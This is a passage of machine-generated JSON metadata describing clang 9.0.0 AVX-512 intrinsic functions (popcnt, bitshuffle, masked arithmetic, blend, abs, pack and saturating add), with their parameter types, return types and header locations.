} }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:44:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:50:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:58:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:66:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:72:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:80:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:88:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:94:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_bitshuffle_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:110:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm256_bitshuffle_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:118:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm_mask_bitshuffle_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:126:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm_bitshuffle_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm256_mask_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:304:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:311:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:318:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:332:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:339:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:346:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:353:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:360:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:367:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:374:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:381:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:388:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:395:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:402:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:409:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:416:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:423:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:430:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:437:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_blend_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:444:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_blend_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:452:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_blend_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:460:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_blend_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:476:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:484:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:500:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:508:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:524:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:540:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:547:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:555:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:563:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:571:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:579:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:587:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:595:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:603:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:619:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:627:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:635:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:643:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:651:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:659:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:667:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:675:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:683:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:691:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } 